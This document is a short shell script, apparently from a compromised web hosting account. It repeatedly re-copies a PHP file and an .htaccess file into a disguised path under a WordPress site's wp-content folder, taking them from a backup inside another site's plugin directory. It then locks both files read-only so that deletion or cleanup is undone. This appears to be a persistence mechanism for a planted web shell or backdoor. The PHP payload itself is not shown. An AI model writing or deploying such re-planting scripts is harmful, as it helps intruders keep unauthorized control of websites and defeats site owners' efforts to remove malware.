#!/bin/sh

FILE="/home/u200768895/domains/ironbaylogistics.com/public_html/wp-content/updraft/widgets/fonts/style-engine/file.php"
SAFE="/home/u200768895/domains/ssbelectrical.ca/public_html/wp-content/plugins/jeg-elementor-kit/file_backup.php"

if [ ! -f "$FILE" ]; then
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
fi

if [ -f "$FILE" ] && ! cmp -s "$FILE" "$SAFE"; then
    chmod 644 "$FILE"
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
fi

HTFILE="/home/u200768895/domains/ironbaylogistics.com/public_html/wp-content/updraft/widgets/fonts/style-engine/.htaccess"
HTSAFE="/home/u200768895/domains/ssbelectrical.ca/public_html/wp-content/plugins/jeg-elementor-kit/.htaccess"

if [ ! -f "$HTFILE" ]; then
    cp "$HTSAFE" "$HTFILE"
    chmod 444 "$HTFILE"
fi

if [ -f "$HTFILE" ] && ! cmp -s "$HTFILE" "$HTSAFE"; then
    chmod 644 "$HTFILE"
    cp "$HTSAFE" "$HTFILE"
    chmod 444 "$HTFILE"
fi
